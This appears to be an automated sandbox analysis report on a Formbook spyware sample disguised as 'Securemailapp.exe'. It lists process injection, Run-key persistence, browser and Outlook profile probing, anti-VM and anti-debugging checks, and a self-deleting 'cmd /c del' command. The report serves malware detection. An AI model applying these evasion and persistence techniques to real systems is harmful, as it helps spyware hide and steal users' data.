Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, Code function: 2_2_0125BD40 NtSuspendThread
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, Code function: 2_2_0125A5A0 NtWriteVirtualMemory
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, Code function: 2_2_0125A430 NtQueryVirtualMemory
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, Code function: 2_2_0125B410 NtOpenProcessToken
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, Code function: 2_2_0125A460 NtOpenProcess
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, Code function: 2_2_0125A470 NtSetInformationFile
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, Code function: 2_2_0125B470 NtOpenThread
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, Code function: 2_2_0125ACE0 NtCreateMutant
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, Code function: 2_2_0125A710 NtQuerySection
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, Code function: 2_2_0125A780 NtOpenDirectoryObject
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, Code function: 2_2_0125A650 NtQueueApcThread
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, Code function: 2_2_0125A6D0 NtCreateProcessEx
Creates files inside the system directory
Source: C:\Windows\SysWOW64\WerFault.exe, File created: C:\Windows\AppCompat\Programs\Amcache.hve.tmp
Detected potential crypto function
Found potential string decryption / allocating functions
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, Code function: String function: 0126DDE8 appears 37 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, Code function: String function: 0121B0E0 appears 174 times
One or more processes crash
Source: unknown, Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 1744 -s 1212
Searches the installation path of Mozilla Firefox
Source: C:\Windows\SysWOW64\chkdsk.exe, Registry key queried: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Mozilla\Mozilla Firefox\63.0.3 (x86 en-US)\Main Install Directory
Tries to load missing DLLs
Source: C:\Windows\explorer.exe, Section loaded: comsvcs.dll
Source: C:\Windows\SysWOW64\WerFault.exe, Section loaded: sfc.dll
Source: C:\Windows\SysWOW64\WerFault.exe, Section loaded: phoneinfo.dll
Source: C:\Windows\SysWOW64\WerFault.exe, Section loaded: ext-ms-win-xblauth-console-l1.dll
Yara signature match
Source: 00000002.00000002.623997254.0000000000D70000.00000040.00000001.sdmp, type: MEMORY, Matched rule: Formbook, author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000002.00000002.623997254.0000000000D70000.00000040.00000001.sdmp, type: MEMORY, Matched rule: Formbook_1, date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000002.00000002.623674502.0000000000BD0000.00000040.00000001.sdmp, type: MEMORY, Matched rule: Formbook, author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000002.00000002.623674502.0000000000BD0000.00000040.00000001.sdmp, type: MEMORY, Matched rule: Formbook_1, date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000002.00000002.622710007.0000000000400000.00000040.00000001.sdmp, type: MEMORY, Matched rule: Formbook, author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000002.00000002.622710007.0000000000400000.00000040.00000001.sdmp, type: MEMORY, Matched rule: Formbook_1, date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 2.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: Formbook, author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 2.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: Formbook_1, date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 2.2.InstallUtil.exe.400000.0.raw.unpack, type: UNPACKEDPE, Matched rule: Formbook, author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 2.2.InstallUtil.exe.400000.0.raw.unpack, type: UNPACKEDPE, Matched rule: Formbook_1, date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Classification label
Source: classification engine, Classification label: mal100.troj.spyw.evad.winEXE@10/11@22/9
Creates files inside the user directoryShow sources
Source: C:\Windows\SysWOW64\chkdsk.exeFile created: C:\Users\user\AppData\Roaming\OP92SA42Jump to behavior
Creates mutexesShow sources
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1156:120:WilError_01
Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess1744
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2980:120:WilError_01
Creates temporary filesShow sources
Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\NoltJump to behavior
PE file has an executable .text section and no other executable sectionShow sources
Source: Securemailapp.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Parts of this application are using the .NET runtime (Probably coded in C#)
Source: C:\Users\user\Desktop\Securemailapp.exe, Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\5e7364da399b604ae01baff696551080\mscorlib.ni.dll
Source: C:\Windows\SysWOW64\WerFault.exe, Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\5e7364da399b604ae01baff696551080\mscorlib.ni.dll
Source: C:\Program Files (x86)\Nolt\chkdskuda.exe, Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\5e7364da399b604ae01baff696551080\mscorlib.ni.dll
Reads ini files
Source: C:\Windows\explorer.exe, File read: C:\Users\desktop.ini
Reads software policies
Source: C:\Users\user\Desktop\Securemailapp.exe, Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Reads the hosts file
Source: C:\Windows\explorer.exe, File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\SysWOW64\chkdsk.exe, File read: C:\Windows\System32\drivers\etc\hosts
Sample is known by Antivirus
Source: Securemailapp.exe, Virustotal: Detection: 64%
Source: Securemailapp.exe, ReversingLabs: Detection: 46%
Spawns processes
Source: unknown, Process created: C:\Users\user\Desktop\Securemailapp.exe 'C:\Users\user\Desktop\Securemailapp.exe'
Source: unknown, Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
Source: unknown, Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 1744 -s 1212
Source: unknown, Process created: C:\Windows\SysWOW64\chkdsk.exe C:\Windows\SysWOW64\chkdsk.exe
Source: unknown, Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe'
Source: unknown, Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown, Process created: C:\Program Files (x86)\Nolt\chkdskuda.exe C:\Program Files (x86)\Nolt\chkdskuda.exe
Source: unknown, Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\explorer.exe, Process created: C:\Program Files (x86)\Nolt\chkdskuda.exe C:\Program Files (x86)\Nolt\chkdskuda.exe
Source: C:\Windows\SysWOW64\chkdsk.exe, Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe'
Uses an in-process (OLE) Automation server
Source: C:\Windows\explorer.exe, Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{9FC8E510-A27C-4B3B-B9A3-BF65F00256A8}\InProcServer32
Writes ini files
Source: C:\Windows\SysWOW64\chkdsk.exe, File written: C:\Users\user\AppData\Roaming\OP92SA42\OP9logri.ini
Found graphical window changes (likely an installer)
Source: Window Recorder, Window detected: More than 3 window changes detected
Checks if Microsoft Office is installed
Source: C:\Windows\SysWOW64\chkdsk.exe, Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
PE file contains a COM descriptor data directory
Source: Securemailapp.exe, Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Contains modern PE file flags such as dynamic base (ASLR) or NX
Source: Securemailapp.exe, Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT, HIGH_ENTROPY_VA
Binary contains paths to debug symbols
Source: Binary string: chkdsk.pdbGCTL source: InstallUtil.exe, 00000002.00000002.622990920.00000000007E0000.00000040.00000001.sdmp
Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000005.00000000.596045813.00000000060D0000.00000002.00000001.sdmp
Source: Binary string: chkdsk.pdb source: InstallUtil.exe, 00000002.00000002.622990920.00000000007E0000.00000040.00000001.sdmp
Source: Binary string: wntdll.pdbUGP source: InstallUtil.exe, 00000002.00000002.624954570.00000000011F0000.00000040.00000001.sdmp
Source: Binary string: wntdll.pdb source: InstallUtil.exe
Source: Binary string: wscui.pdb source: explorer.exe, 00000005.00000000.596045813.00000000060D0000.00000002.00000001.sdmp

Data Obfuscation:

.NET source code contains potential unpacker
Source: Securemailapp.exe, wtf/FbsRkpqvExsIjWfLPC.cs, .Net Code: Load System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 0.0.Securemailapp.exe.7f0000.0.unpack, wtf/FbsRkpqvExsIjWfLPC.cs, .Net Code: Load System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Uses code obfuscation techniques (call, push, ret)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, Code function: 2_2_00419A55 push eax; ret 2_2_00419AA8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, Code function: 2_2_00402276 push edi; ret 2_2_0040227F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, Code function: 2_2_00419AA2 push eax; ret 2_2_00419AA8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, Code function: 2_2_00419AAB push eax; ret 2_2_00419B12
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, Code function: 2_2_00416B52 push edi; iretd 2_2_00416B5C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, Code function: 2_2_00419B0C push eax; ret 2_2_00419B12
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, Code function: 2_2_004146B3 push esi; iretd 2_2_004146B4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, Code function: 2_2_00413F6E push ebp; retf 2_2_0041406D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, Code function: 2_2_0040DFC3 push edi; ret 2_2_0040DFC5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, Code function: 2_2_00414FFC push ebx; ret 2_2_00415004
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, Code function: 2_2_0126DE2D push ecx; ret 2_2_0126DE40

Boot Survival:

Creates an autostart registry key
Source: C:\Windows\SysWOW64\chkdsk.exe, Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run JBD0UFWPRTF

Hooking and other Techniques for Hiding and Protection:

Disables application error messages (SetErrorMode)
Source: C:\Users\user\Desktop\Securemailapp.exe, Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe, Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe, Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe, Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\chkdsk.exe, Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Nolt\chkdskuda.exe, Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Tries to detect virtualization through RDTSC time measurements
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, RDTSC instruction interceptor: First address: 0000000000407244 second address: 000000000040724A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, RDTSC instruction interceptor: First address: 00000000004074BE second address: 00000000004074C4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\chkdsk.exe, RDTSC instruction interceptor: First address: 0000000000A07244 second address: 0000000000A0724A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\chkdsk.exe, RDTSC instruction interceptor: First address: 0000000000A074BE second address: 0000000000A074C4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, Code function: 2_2_004073F0 rdtsc 2_2_004073F0
Contains long sleeps (>= 3 min)
Source: C:\Program Files (x86)\Nolt\chkdskuda.exe, Thread delayed: delay time: 922337203685477
Found large amount of non-executed APIs
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, API coverage: 4.4 %
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\explorer.exe TID: 1496, Thread sleep time: -50000s >= -30000s
Source: C:\Windows\SysWOW64\chkdsk.exe TID: 1864, Thread sleep count: 57 > 30
Source: C:\Windows\SysWOW64\chkdsk.exe TID: 1864, Thread sleep time: -285000s >= -30000s
Source: C:\Program Files (x86)\Nolt\chkdskuda.exe TID: 4880, Thread sleep time: -922337203685477s >= -30000s
Queries disk information (often used to detect virtual machines)
Source: C:\Windows\SysWOW64\WerFault.exe, File opened: PhysicalDrive0
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\explorer.exe, Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe, Last function: Thread delayed
May try to detect the virtual machine to hinder analysis (VM artifact strings found in memory)
Source: explorer.exe, 00000005.00000000.599474745.0000000007560000.00000002.00000001.sdmp, Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: explorer.exe, 00000005.00000000.599474745.0000000007560000.00000002.00000001.sdmp, Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: explorer.exe, 00000005.00000000.599474745.0000000007560000.00000002.00000001.sdmp, Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: explorer.exe, 00000005.00000000.599474745.0000000007560000.00000002.00000001.sdmp, Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
Queries a list of all running processes
Source: C:\Users\user\Desktop\Securemailapp.exe, Process information queried: ProcessInformation

Anti Debugging:

Checks if the current process is being debugged
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, Process queried: DebugPort
Source: C:\Windows\SysWOW64\chkdsk.exe, Process queried: DebugPort
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, Code function: 2_2_004073F0 rdtsc 2_2_004073F0
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, Code function: 2_2_00408440 LdrLoadDll,2_2_00408440
Contains functionality to read the PEB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_012DA844 mov eax, dword ptr fs:[00000030h]2_2_012DA844
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_012DA844 mov eax, dword ptr fs:[00000030h]2_2_012DA844
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_01219050 mov eax, dword ptr fs:[00000030h]2_2_01219050
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_0122F050 mov eax, dword ptr fs:[00000030h]2_2_0122F050
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_0122F050 mov eax, dword ptr fs:[00000030h]2_2_0122F050
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_012E08A5 mov eax, dword ptr fs:[00000030h]2_2_012E08A5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_012E08A5 mov eax, dword ptr fs:[00000030h]2_2_012E08A5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_012E08A5 mov eax, dword ptr fs:[00000030h]2_2_012E08A5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_012940A7 mov eax, dword ptr fs:[00000030h]2_2_012940A7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_012158BC mov eax, dword ptr fs:[00000030h]2_2_012158BC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_012D50B3 mov eax, dword ptr fs:[00000030h]2_2_012D50B3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_012D50B3 mov eax, dword ptr fs:[00000030h]2_2_012D50B3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_012A2893 mov eax, dword ptr fs:[00000030h]2_2_012A2893
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_0123E0E8 mov eax, dword ptr fs:[00000030h]2_2_0123E0E8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_012458EB mov eax, dword ptr fs:[00000030h]2_2_012458EB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_012458EB mov eax, dword ptr fs:[00000030h]2_2_012458EB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_012DB8F9 mov eax, dword ptr fs:[00000030h]2_2_012DB8F9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_012DB8F9 mov eax, dword ptr fs:[00000030h]2_2_012DB8F9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_012AF8F0 mov eax, dword ptr fs:[00000030h]2_2_012AF8F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_012AF8F0 mov eax, dword ptr fs:[00000030h]2_2_012AF8F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_012D10CF mov eax, dword ptr fs:[00000030h]2_2_012D10CF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_012CF8C0 mov eax, dword ptr fs:[00000030h]2_2_012CF8C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_012448CB mov eax, dword ptr fs:[00000030h]2_2_012448CB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_012448CB mov eax, dword ptr fs:[00000030h]2_2_012448CB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_012448CB mov eax, dword ptr fs:[00000030h]2_2_012448CB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_012190D0 mov eax, dword ptr fs:[00000030h]2_2_012190D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_012190D0 mov eax, dword ptr fs:[00000030h]2_2_012190D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_012190D0 mov eax, dword ptr fs:[00000030h]2_2_012190D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_0121C330 mov eax, dword ptr fs:[00000030h]2_2_0121C330
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_0121C330 mov eax, dword ptr fs:[00000030h]2_2_0121C330
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_0121C330 mov eax, dword ptr fs:[00000030h]2_2_0121C330
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_0124AB0C mov eax, dword ptr fs:[00000030h]2_2_0124AB0C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_0124AB0C mov eax, dword ptr fs:[00000030h]2_2_0124AB0C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_0125536C mov eax, dword ptr fs:[00000030h]2_2_0125536C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_0125536C mov eax, dword ptr fs:[00000030h]2_2_0125536C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_012DE362 mov eax, dword ptr fs:[00000030h]2_2_012DE362
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_0122E370 mov eax, dword ptr fs:[00000030h]2_2_0122E370
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_0122E370 mov eax, dword ptr fs:[00000030h]2_2_0122E370
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_0122E370 mov eax, dword ptr fs:[00000030h]2_2_0122E370
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_0123FB40 mov eax, dword ptr fs:[00000030h]2_2_0123FB40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_0123FB40 mov eax, dword ptr fs:[00000030h]2_2_0123FB40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_0123FB40 mov eax, dword ptr fs:[00000030h]2_2_0123FB40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_0123FB40 mov eax, dword ptr fs:[00000030h]2_2_0123FB40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_0123FB40 mov eax, dword ptr fs:[00000030h]2_2_0123FB40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_0123FB40 mov eax, dword ptr fs:[00000030h]2_2_0123FB40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_01241356 mov eax, dword ptr fs:[00000030h]2_2_01241356
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_01241356 mov eax, dword ptr fs:[00000030h]2_2_01241356
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_01241356 mov eax, dword ptr fs:[00000030h]2_2_01241356
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_01241356 mov eax, dword ptr fs:[00000030h]2_2_01241356
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_01241356 mov eax, dword ptr fs:[00000030h]2_2_01241356
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_01241356 mov eax, dword ptr fs:[00000030h]2_2_01241356
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_01241356 mov eax, dword ptr fs:[00000030h]2_2_01241356
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_012E8356 mov eax, dword ptr fs:[00000030h]2_2_012E8356
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_012D1351 mov eax, dword ptr fs:[00000030h]2_2_012D1351
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_012D43A4 mov eax, dword ptr fs:[00000030h]2_2_012D43A4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_012D43A4 mov eax, dword ptr fs:[00000030h]2_2_012D43A4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_012D43A4 mov eax, dword ptr fs:[00000030h]2_2_012D43A4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_012D43A4 mov eax, dword ptr fs:[00000030h]2_2_012D43A4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_012963A6 mov eax, dword ptr fs:[00000030h]2_2_012963A6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_01214BB4 mov edi, dword ptr fs:[00000030h]2_2_01214BB4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_01294BBE mov eax, dword ptr fs:[00000030h]2_2_01294BBE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_01294BBE mov eax, dword ptr fs:[00000030h]2_2_01294BBE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_01294BBE mov eax, dword ptr fs:[00000030h]2_2_01294BBE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_01294BBE mov eax, dword ptr fs:[00000030h]2_2_01294BBE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_0124BBBC mov eax, dword ptr fs:[00000030h]2_2_0124BBBC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_012D9B89 mov eax, dword ptr fs:[00000030h]2_2_012D9B89
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_012D9B89 mov ecx, dword ptr fs:[00000030h]2_2_012D9B89
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_01244B96 mov eax, dword ptr fs:[00000030h]2_2_01244B96
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_01244B96 mov eax, dword ptr fs:[00000030h]2_2_01244B96
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_01244B96 mov eax, dword ptr fs:[00000030h]2_2_01244B96
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_01244B96 mov eax, dword ptr fs:[00000030h]2_2_01244B96
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_01244B96 mov eax, dword ptr fs:[00000030h]2_2_01244B96
